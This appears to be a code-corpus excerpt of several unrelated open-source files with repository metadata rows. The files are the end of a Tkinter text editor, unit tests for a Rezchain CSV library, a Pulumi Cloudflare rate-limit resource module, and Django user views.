print("Open operation cancelled")
return
create_file(content, filename)
def save_file():
file_path = filedialog.asksaveasfilename()
try:
filename = file_path.split("/")[-1]
text_widget = get_text_widget()
content = text_widget.get("1.0", "end-1c")
with open(file_path, "w") as file:
file.write(content)
except (AttributeError, FileNotFoundError):
print("Save operation cancelled")
return
notebook.tab("current", text=filename)
text_contents[str(text_widget)] = hash(content)
def show_about_info():
messagebox.showinfo(
title="About",
message="The Teclado Text Editor is a simple tabbed text editor designed to help you learn Tkinter!",
)
root = tk.Tk()
root.title("Teclado Text Editor")
root.option_add("*tearOff", False)
main = ttk.Frame(root)
main.pack(fill="both", expand=True, padx=(1), pady=(4, 0))
menubar = tk.Menu(root)
root.config(menu=menubar)
file_menu = tk.Menu(menubar)
help_menu = tk.Menu(menubar)
menubar.add_cascade(menu=file_menu, label="File")
menubar.add_cascade(menu=help_menu, label="Help")
file_menu.add_command(label="New", command=create_file, accelerator="Ctrl+N")
file_menu.add_command(label="Open...", command=open_file, accelerator="Ctrl+O")
file_menu.add_command(label="Save", command=save_file, accelerator="Ctrl+S")
file_menu.add_command(
label="Close Tab", command=close_current_tab, accelerator="Ctrl+Q"
)
file_menu.add_command(label="Exit", command=confirm_quit)
help_menu.add_command(label="About", command=show_about_info)
notebook = ttk.Notebook(main)
notebook.pack(fill="both", expand=True)
create_file()
root.bind("<KeyPress>", lambda event: check_for_changes())
root.bind("<Control-n>", lambda event: create_file())
root.bind("<Control-o>", lambda event: open_file())
root.bind("<Control-q>", lambda event: close_current_tab())
root.bind("<Control-s>", lambda event: save_file())
root.mainloop()
| 26.149701 | 109 | 0.672544 |
4a22516d2e24493c290c24853c4acadea66a3dd1 | 4,882 | py | Python | src/tests/rezchain_test.py | Webjet/RezchainCSV | 36642689f179c56be724cab3a136574a61518048 | [
"Apache-2.0"
] | null | null | null | src/tests/rezchain_test.py | Webjet/RezchainCSV | 36642689f179c56be724cab3a136574a61518048 | [
"Apache-2.0"
] | null | null | null | src/tests/rezchain_test.py | Webjet/RezchainCSV | 36642689f179c56be724cab3a136574a61518048 | [
"Apache-2.0"
] | 1 | 2021-03-18T12:38:36.000Z | 2021-03-18T12:38:36.000Z | from numbers import Number
import tempfile
import unittest
from datetime import date, datetime
from context import *
# from rezchaincsv.exceptions import ItemWrong, MapWrong
REQUIRED = {
"reference": "Common Reference ID",
"amount": "Amount",
"currency": "Currency",
"status": "Booking Status",
"last_modified": "Last Modified Date",
}
OPTIONAL = {
"checkin": "Check In Date",
"checkout": "Check Out Date",
"nights": "Number Of Nights",
"rooms": "Number Of Rooms",
"creation": "Booking Creation Date",
"id": "Your Booking ID",
}
class TestStringMethods(unittest.TestCase):
def test_required(self):
rz = Rezchain(REQUIRED)
self.assertEqual(set(rz.types.keys()), set(REQUIRED.keys()))
def test_extra(self):
# Bad timestamp
m = REQUIRED.copy()
m["test"] = None
m["test_number"] = Number(null=True)
m["test_null"] = Number(null=True)
m["date_null"] = Date(null=True)
rz = Rezchain(m)
d = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01 00:00:00",
"test": 5,
"test_number": "7",
"test_null": "a",
"date_null": "z",
}
it = rz.add_item(d)
self.assertIsInstance(it["test"], str)
self.assertEqual(it["test"], "5")
def test_extra_error(self):
# Bad timestamp
m = REQUIRED.copy()
m["test_number"] = Number()
rz = Rezchain(m)
d = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01 00:00:00",
"test_number": "a",
}
self.assertRaises(ValueError, rz.add_item, d)
    def test_missing_required(self):
self.assertRaises(MapMissing, Rezchain, {"reference": "Common Reference ID"})
def test_bad_timestamp(self):
# Bad timestamp
rz = Rezchain(REQUIRED)
d = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01-bad",
}
self.assertRaises(ValueError, rz.add_item, d)
def test_bad_date(self):
# Bad timestamp
m = REQUIRED.copy()
m["creation"] = "Booking Creation Date"
rz = Rezchain(m)
d = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01 00:00:00",
"creation": "2021-01-234",
}
self.assertRaises(ValueError, rz.add_item, d)
def test_unmapped(self):
# Bad extra value
rz = Rezchain(REQUIRED)
it = {
"reference": "id",
"amount": 1,
"currency": "CUR",
"status": "status",
"last_modified": "2021-01-01 00:00:00",
"extra": "wrong"
}
it = rz.add_item(it)
self.assertFalse("extra" in it)
def test_csv(self):
rz = Rezchain({**REQUIRED, **OPTIONAL})
for i in range(100):
it = {
"reference": i,
"amount": i * 100,
"currency": f"CU{i}",
"status": "CONFIRMED",
"rooms": i,
}
if i % 2 == 0:
# test native times
it["last_modified"] = datetime.utcnow()
it["creation"] = date.today()
else:
# test iso times
it["last_modified"] = datetime.utcnow().isoformat()
it["creation"] = date.today().isoformat()
rz.add_item(it)
with tempfile.NamedTemporaryFile() as tmp:
tmp_size = rz.to_csv(tmp.name)
self.assertGreater(tmp_size, 0)
def test_azure(self):
rz = Rezchain({**REQUIRED, **OPTIONAL})
for i in range(100):
it = {
"reference": i,
"amount": i * 100,
"currency": f"CU{i}",
"status": "CONFIRMED",
"rooms": i,
}
if i % 2 == 0:
# test native times
it["last_modified"] = datetime.utcnow()
it["creation"] = date.today()
else:
# test iso times
it["last_modified"] = datetime.utcnow().isoformat()
it["creation"] = date.today().isoformat()
rz.add_item(it)
with tempfile.NamedTemporaryFile() as tmp:
tmp_size = rz.to_csv(tmp.name)
azure_size = rz.to_azure("", "", "", test=True)
self.assertAlmostEqual(tmp_size, azure_size)
if __name__ == '__main__':
unittest.main()
| 29.768293 | 85 | 0.491602 |
4a225173dc61db3e7e2bc7ccebd039d4c61c1126 | 31,130 | py | Python | sdk/python/pulumi_cloudflare/rate_limit.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 35 | 2019-03-14T21:29:29.000Z | 2022-03-30T00:00:59.000Z | sdk/python/pulumi_cloudflare/rate_limit.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 128 | 2019-03-08T23:45:58.000Z | 2022-03-31T21:05:22.000Z | sdk/python/pulumi_cloudflare/rate_limit.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2019-05-10T12:52:56.000Z | 2020-03-24T15:02:14.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RateLimitArgs', 'RateLimit']
@pulumi.input_type
class RateLimitArgs:
def __init__(__self__, *,
action: pulumi.Input['RateLimitActionArgs'],
period: pulumi.Input[int],
threshold: pulumi.Input[int],
zone_id: pulumi.Input[str],
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input['RateLimitCorrelateArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input['RateLimitMatchArgs']] = None):
"""
The set of arguments for constructing a RateLimit resource.
:param pulumi.Input['RateLimitActionArgs'] action: The action to be performed when the threshold of matched traffic within the period defined is exceeded.
:param pulumi.Input[int] period: The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
:param pulumi.Input[int] threshold: The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
:param pulumi.Input[str] zone_id: The DNS zone ID to apply rate limiting to.
:param pulumi.Input[Sequence[pulumi.Input[str]]] bypass_url_patterns: URLs matching the patterns specified here will be excluded from rate limiting.
:param pulumi.Input['RateLimitCorrelateArgs'] correlate: Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
:param pulumi.Input[str] description: A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
:param pulumi.Input[bool] disabled: Whether this ratelimit is currently disabled. Default: `false`.
:param pulumi.Input['RateLimitMatchArgs'] match: Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
"""
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "period", period)
pulumi.set(__self__, "threshold", threshold)
pulumi.set(__self__, "zone_id", zone_id)
if bypass_url_patterns is not None:
pulumi.set(__self__, "bypass_url_patterns", bypass_url_patterns)
if correlate is not None:
pulumi.set(__self__, "correlate", correlate)
if description is not None:
pulumi.set(__self__, "description", description)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if match is not None:
pulumi.set(__self__, "match", match)
@property
@pulumi.getter
def action(self) -> pulumi.Input['RateLimitActionArgs']:
"""
The action to be performed when the threshold of matched traffic within the period defined is exceeded.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['RateLimitActionArgs']):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def period(self) -> pulumi.Input[int]:
"""
The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: pulumi.Input[int]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[int]:
"""
The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[int]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> pulumi.Input[str]:
"""
The DNS zone ID to apply rate limiting to.
"""
return pulumi.get(self, "zone_id")
@zone_id.setter
def zone_id(self, value: pulumi.Input[str]):
pulumi.set(self, "zone_id", value)
@property
@pulumi.getter(name="bypassUrlPatterns")
def bypass_url_patterns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
URLs matching the patterns specified here will be excluded from rate limiting.
"""
return pulumi.get(self, "bypass_url_patterns")
@bypass_url_patterns.setter
def bypass_url_patterns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "bypass_url_patterns", value)
@property
@pulumi.getter
def correlate(self) -> Optional[pulumi.Input['RateLimitCorrelateArgs']]:
"""
Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
"""
return pulumi.get(self, "correlate")
@correlate.setter
def correlate(self, value: Optional[pulumi.Input['RateLimitCorrelateArgs']]):
pulumi.set(self, "correlate", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this ratelimit is currently disabled. Default: `false`.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def match(self) -> Optional[pulumi.Input['RateLimitMatchArgs']]:
"""
Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
"""
return pulumi.get(self, "match")
@match.setter
def match(self, value: Optional[pulumi.Input['RateLimitMatchArgs']]):
pulumi.set(self, "match", value)
@pulumi.input_type
class _RateLimitState:
def __init__(__self__, *,
action: Optional[pulumi.Input['RateLimitActionArgs']] = None,
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input['RateLimitCorrelateArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input['RateLimitMatchArgs']] = None,
period: Optional[pulumi.Input[int]] = None,
threshold: Optional[pulumi.Input[int]] = None,
zone_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering RateLimit resources.
:param pulumi.Input['RateLimitActionArgs'] action: The action to be performed when the threshold of matched traffic within the period defined is exceeded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] bypass_url_patterns: URLs matching the patterns specified here will be excluded from rate limiting.
:param pulumi.Input['RateLimitCorrelateArgs'] correlate: Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
:param pulumi.Input[str] description: A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
:param pulumi.Input[bool] disabled: Whether this ratelimit is currently disabled. Default: `false`.
:param pulumi.Input['RateLimitMatchArgs'] match: Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
:param pulumi.Input[int] period: The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
:param pulumi.Input[int] threshold: The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
:param pulumi.Input[str] zone_id: The DNS zone ID to apply rate limiting to.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if bypass_url_patterns is not None:
pulumi.set(__self__, "bypass_url_patterns", bypass_url_patterns)
if correlate is not None:
pulumi.set(__self__, "correlate", correlate)
if description is not None:
pulumi.set(__self__, "description", description)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if match is not None:
pulumi.set(__self__, "match", match)
if period is not None:
pulumi.set(__self__, "period", period)
if threshold is not None:
pulumi.set(__self__, "threshold", threshold)
if zone_id is not None:
pulumi.set(__self__, "zone_id", zone_id)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input['RateLimitActionArgs']]:
"""
The action to be performed when the threshold of matched traffic within the period defined is exceeded.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input['RateLimitActionArgs']]):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="bypassUrlPatterns")
def bypass_url_patterns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
URLs matching the patterns specified here will be excluded from rate limiting.
"""
return pulumi.get(self, "bypass_url_patterns")
@bypass_url_patterns.setter
def bypass_url_patterns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "bypass_url_patterns", value)
@property
@pulumi.getter
def correlate(self) -> Optional[pulumi.Input['RateLimitCorrelateArgs']]:
"""
Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
"""
return pulumi.get(self, "correlate")
@correlate.setter
def correlate(self, value: Optional[pulumi.Input['RateLimitCorrelateArgs']]):
pulumi.set(self, "correlate", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this ratelimit is currently disabled. Default: `false`.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def match(self) -> Optional[pulumi.Input['RateLimitMatchArgs']]:
"""
Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
"""
return pulumi.get(self, "match")
@match.setter
def match(self, value: Optional[pulumi.Input['RateLimitMatchArgs']]):
pulumi.set(self, "match", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def threshold(self) -> Optional[pulumi.Input[int]]:
"""
The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> Optional[pulumi.Input[str]]:
"""
The DNS zone ID to apply rate limiting to.
"""
return pulumi.get(self, "zone_id")
@zone_id.setter
def zone_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone_id", value)
class RateLimit(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['RateLimitActionArgs']]] = None,
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input[pulumi.InputType['RateLimitMatchArgs']]] = None,
period: Optional[pulumi.Input[int]] = None,
threshold: Optional[pulumi.Input[int]] = None,
zone_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Cloudflare rate limit resource for a given zone. This can be used to limit the traffic you receive zone-wide, or matching more specific types of requests/responses.
## Example Usage
```python
import pulumi
import pulumi_cloudflare as cloudflare
example = cloudflare.RateLimit("example",
zone_id=var["cloudflare_zone_id"],
threshold=2000,
period=2,
match=cloudflare.RateLimitMatchArgs(
request=cloudflare.RateLimitMatchRequestArgs(
url_pattern=f"{var['cloudflare_zone']}/*",
schemes=[
"HTTP",
"HTTPS",
],
methods=[
"GET",
"POST",
"PUT",
"DELETE",
"PATCH",
"HEAD",
],
),
response=cloudflare.RateLimitMatchResponseArgs(
statuses=[
200,
201,
202,
301,
429,
],
origin_traffic=False,
headers=[
{
"name": "Host",
"op": "eq",
"value": "localhost",
},
{
"name": "X-Example",
"op": "ne",
"value": "my-example",
},
],
),
),
action=cloudflare.RateLimitActionArgs(
mode="simulate",
timeout=43200,
response=cloudflare.RateLimitActionResponseArgs(
content_type="text/plain",
body="custom response body",
),
),
correlate=cloudflare.RateLimitCorrelateArgs(
by="nat",
),
disabled=False,
description="example rate limit for a zone",
bypass_url_patterns=[
f"{var['cloudflare_zone']}/bypass1",
f"{var['cloudflare_zone']}/bypass2",
])
```
## Import
Rate limits can be imported using a composite ID formed of zone name and rate limit ID, e.g.
```sh
$ pulumi import cloudflare:index/rateLimit:RateLimit default d41d8cd98f00b204e9800998ecf8427e/ch8374ftwdghsif43
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['RateLimitActionArgs']] action: The action to be performed when the threshold of matched traffic within the period defined is exceeded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] bypass_url_patterns: URLs matching the patterns specified here will be excluded from rate limiting.
:param pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']] correlate: Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
:param pulumi.Input[str] description: A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
:param pulumi.Input[bool] disabled: Whether this ratelimit is currently disabled. Default: `false`.
:param pulumi.Input[pulumi.InputType['RateLimitMatchArgs']] match: Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
:param pulumi.Input[int] period: The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
:param pulumi.Input[int] threshold: The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
:param pulumi.Input[str] zone_id: The DNS zone ID to apply rate limiting to.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RateLimitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Cloudflare rate limit resource for a given zone. This can be used to limit the traffic you receive zone-wide, or matching more specific types of requests/responses.
## Example Usage
```python
import pulumi
import pulumi_cloudflare as cloudflare
example = cloudflare.RateLimit("example",
zone_id=var["cloudflare_zone_id"],
threshold=2000,
period=2,
match=cloudflare.RateLimitMatchArgs(
request=cloudflare.RateLimitMatchRequestArgs(
url_pattern=f"{var['cloudflare_zone']}/*",
schemes=[
"HTTP",
"HTTPS",
],
methods=[
"GET",
"POST",
"PUT",
"DELETE",
"PATCH",
"HEAD",
],
),
response=cloudflare.RateLimitMatchResponseArgs(
statuses=[
200,
201,
202,
301,
429,
],
origin_traffic=False,
headers=[
{
"name": "Host",
"op": "eq",
"value": "localhost",
},
{
"name": "X-Example",
"op": "ne",
"value": "my-example",
},
],
),
),
action=cloudflare.RateLimitActionArgs(
mode="simulate",
timeout=43200,
response=cloudflare.RateLimitActionResponseArgs(
content_type="text/plain",
body="custom response body",
),
),
correlate=cloudflare.RateLimitCorrelateArgs(
by="nat",
),
disabled=False,
description="example rate limit for a zone",
bypass_url_patterns=[
f"{var['cloudflare_zone']}/bypass1",
f"{var['cloudflare_zone']}/bypass2",
])
```
## Import
Rate limits can be imported using a composite ID formed of zone name and rate limit ID, e.g.
```sh
$ pulumi import cloudflare:index/rateLimit:RateLimit default d41d8cd98f00b204e9800998ecf8427e/ch8374ftwdghsif43
```
:param str resource_name: The name of the resource.
:param RateLimitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RateLimitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['RateLimitActionArgs']]] = None,
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input[pulumi.InputType['RateLimitMatchArgs']]] = None,
period: Optional[pulumi.Input[int]] = None,
threshold: Optional[pulumi.Input[int]] = None,
zone_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RateLimitArgs.__new__(RateLimitArgs)
if action is None and not opts.urn:
raise TypeError("Missing required property 'action'")
__props__.__dict__["action"] = action
__props__.__dict__["bypass_url_patterns"] = bypass_url_patterns
__props__.__dict__["correlate"] = correlate
__props__.__dict__["description"] = description
__props__.__dict__["disabled"] = disabled
__props__.__dict__["match"] = match
if period is None and not opts.urn:
raise TypeError("Missing required property 'period'")
__props__.__dict__["period"] = period
if threshold is None and not opts.urn:
raise TypeError("Missing required property 'threshold'")
__props__.__dict__["threshold"] = threshold
if zone_id is None and not opts.urn:
raise TypeError("Missing required property 'zone_id'")
__props__.__dict__["zone_id"] = zone_id
super(RateLimit, __self__).__init__(
'cloudflare:index/rateLimit:RateLimit',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['RateLimitActionArgs']]] = None,
bypass_url_patterns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
correlate: Optional[pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input[pulumi.InputType['RateLimitMatchArgs']]] = None,
period: Optional[pulumi.Input[int]] = None,
threshold: Optional[pulumi.Input[int]] = None,
zone_id: Optional[pulumi.Input[str]] = None) -> 'RateLimit':
"""
Get an existing RateLimit resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['RateLimitActionArgs']] action: The action to be performed when the threshold of matched traffic within the period defined is exceeded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] bypass_url_patterns: URLs matching the patterns specified here will be excluded from rate limiting.
:param pulumi.Input[pulumi.InputType['RateLimitCorrelateArgs']] correlate: Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
:param pulumi.Input[str] description: A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
:param pulumi.Input[bool] disabled: Whether this ratelimit is currently disabled. Default: `false`.
:param pulumi.Input[pulumi.InputType['RateLimitMatchArgs']] match: Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
:param pulumi.Input[int] period: The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
:param pulumi.Input[int] threshold: The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
:param pulumi.Input[str] zone_id: The DNS zone ID to apply rate limiting to.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RateLimitState.__new__(_RateLimitState)
__props__.__dict__["action"] = action
__props__.__dict__["bypass_url_patterns"] = bypass_url_patterns
__props__.__dict__["correlate"] = correlate
__props__.__dict__["description"] = description
__props__.__dict__["disabled"] = disabled
__props__.__dict__["match"] = match
__props__.__dict__["period"] = period
__props__.__dict__["threshold"] = threshold
__props__.__dict__["zone_id"] = zone_id
return RateLimit(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def action(self) -> pulumi.Output['outputs.RateLimitAction']:
"""
The action to be performed when the threshold of matched traffic within the period defined is exceeded.
"""
return pulumi.get(self, "action")
@property
@pulumi.getter(name="bypassUrlPatterns")
def bypass_url_patterns(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
URLs matching the patterns specified here will be excluded from rate limiting.
"""
return pulumi.get(self, "bypass_url_patterns")
@property
@pulumi.getter
def correlate(self) -> pulumi.Output[Optional['outputs.RateLimitCorrelate']]:
"""
Determines how rate limiting is applied. By default if not specified, rate limiting applies to the clients IP address.
"""
return pulumi.get(self, "correlate")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A note that you can use to describe the reason for a rate limit. This value is sanitized and all tags are removed.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def disabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether this ratelimit is currently disabled. Default: `false`.
"""
return pulumi.get(self, "disabled")
@property
@pulumi.getter
def match(self) -> pulumi.Output['outputs.RateLimitMatch']:
"""
Determines which traffic the rate limit counts towards the threshold. By default matches all traffic in the zone. See definition below.
"""
return pulumi.get(self, "match")
@property
@pulumi.getter
def period(self) -> pulumi.Output[int]:
"""
The time in seconds to count matching traffic. If the count exceeds threshold within this period the action will be performed (min: 1, max: 86,400).
"""
return pulumi.get(self, "period")
@property
@pulumi.getter
def threshold(self) -> pulumi.Output[int]:
"""
The threshold that triggers the rate limit mitigations, combine with period. i.e. threshold per period (min: 2, max: 1,000,000).
"""
return pulumi.get(self, "threshold")
@property
@pulumi.getter(name="zoneId")
def zone_id(self) -> pulumi.Output[str]:
"""
The DNS zone ID to apply rate limiting to.
"""
return pulumi.get(self, "zone_id")
| 45.645161 | 210 | 0.615291 |
4a225188ac14f1aaa3308ff887b40de15c1d1978 | 1,474 | py | Python | wiki_allatra_club/users/views.py | skhalymon/wiki-and-reader | 9a585170a0d62641a6d71b0696a777e12c7d0546 | [
"BSD-3-Clause"
] | null | null | null | wiki_allatra_club/users/views.py | skhalymon/wiki-and-reader | 9a585170a0d62641a6d71b0696a777e12c7d0546 | [
"BSD-3-Clause"
] | null | null | null | wiki_allatra_club/users/views.py | skhalymon/wiki-and-reader | 9a585170a0d62641a6d71b0696a777e12c7d0546 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.core.urlresolvers import reverse
from django.views.generic import DetailView, ListView, RedirectView, UpdateView
from braces.views import LoginRequiredMixin
from .forms import UserForm
from .models import User
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
class UserUpdateView(LoginRequiredMixin, UpdateView):
form_class = UserForm
# we already imported User in the view code above, remember?
model = User
# send the user back to their own page after a successful update
def get_success_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
def get_object(self):
# Only get the User record for the user making the request
return User.objects.get(username=self.request.user.username)
class UserListView(LoginRequiredMixin, ListView):
model = User
    # slug_field/slug_url_kwarg are carried over from the detail view; a plain ListView does not use them for lookups
slug_field = "username"
slug_url_kwarg = "username" | 30.081633 | 79 | 0.719132 |
4a2251e44295aae19eca24e92d5d6bf7ac80602f | 30,917 | py | Python | lib/galaxy/config/config_manage.py | NordicESMhub/galaxy | ec3ffb7d8ec5dac9b179f4c9d39b8060b69d5492 | [
"CC-BY-3.0"
